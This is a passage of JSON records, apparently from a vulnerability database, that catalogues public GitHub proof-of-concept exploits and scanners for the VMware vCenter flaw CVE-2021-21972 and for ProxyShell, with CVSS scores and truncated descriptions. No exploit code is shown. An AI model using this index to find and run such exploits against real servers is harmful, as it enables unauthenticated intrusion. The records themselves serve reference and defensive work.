"version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-28T11:58:37", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-06T09:04:59", "description": "<b>[CVE-2021-21972] VMware vSphere Client Unauthorized File Uplo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-06T10:38:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973", "CVE-2021-21972"], "modified": "2022-01-06T08:29:25", "id": "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:24", "description": "# CVE-2021-21972\nCVE-2021-21972 Unauthorized RCE in VMware vCent...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T16:30:36", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-27T13:08:53", "id": "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:53", "description": "# CVE-2021-21972\n\n## Description \nThe vSphere Client (HTML5) co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T05:16:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-06-20T12:51:14", "id": "5711B5D3-F257-5128-8C1A-908EACEAEC29", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:41", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-03T12:09:53", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-03T12:10:03", "id": "64EF6553-4D22-526B-A1CC-09212DBD7625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:50:02", "description": "## \u4f7f\u7528\u65b9\u6cd5&\u514d\u8d23\u58f0\u660e\r\n\r\nVMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (CVE-2021-21972)\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T10:16:20", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:29:19", "id": "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:50", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T05:10:06", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-06-20T12:51:14", "id": "50618611-3CA9-5185-8ED3-53532D99D4B7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:57", "description": "# CVE-2021-21972\nCVE-2021-21972\n\nTested against VMware VCSA 6.7\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T13:04:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-07-14T14:37:02", "id": "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:43", "description": "# VMware_vCenter_CVE-2021-21972\nVMware vCenter CVE-2021-21972 Re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-27T10:27:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-14T04:48:32", "id": "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:49:58", "description": "# CVE-2021-21972\nProof of Concept Exploit for vCenter CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T16:31:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:25:14", "id": "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:59", "description": "# westone-CVE-2021-21972-scanner \nVMware vCenter Server remote ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T03:19:25", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-20T07:55:11", "id": "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-11T18:15:07", "description": "### VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972\n\n**zoomeye do...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-17T08:08:50", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2023-01-11T15:52:53", "id": "469C0F00-66DC-5CDD-9696-9825B0F19CD0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:43", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-01T14:14:01", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-04-28T02:16:46", "id": "D4220876-A611-59AE-8262-07797542DAB9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:37", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T21:30:50", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-07-30T17:30:38", "id": "626E6774-0ACC-594C-BB61-E89F8F034B11", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:28", "description": "# CVE-2021-34473-scanner\nScanner for CVE-2021-34473, ProxyShell,...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T12:20:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-12-22T09:48:36", "id": "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-11T15:28:01", "description": "# CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\n### poc Jus...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-17T08:09:38", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2023-01-11T14:57:29", "id": "5E4FD72D-F9FA-517E-8D32-BF1F8D11835E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:51", "description": "# CVE-2021-21972\n\n### \u6f0f\u6d1e\u63cf\u8ff0\n\ncve-2021-21972\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n\u5177\u6709443\u7aef\u53e3\u8bbf\u95ee\u6743\u9650\u7684\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T13:19:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-22T11:25:34", "id": "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-08T02:18:27", "description": "# CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\n### poc Jus...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T09:56:21", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-07T12:56:09", "id": "C98B31E5-B85D-50EE-9596-F00F1B89A800", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:44:15", "description": "# cve-2021-21972\n\n##\u4f7f\u7528\u8bf4\u660e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T03:01:46", "type": "githubexploit", "title": "Exploit for Missing 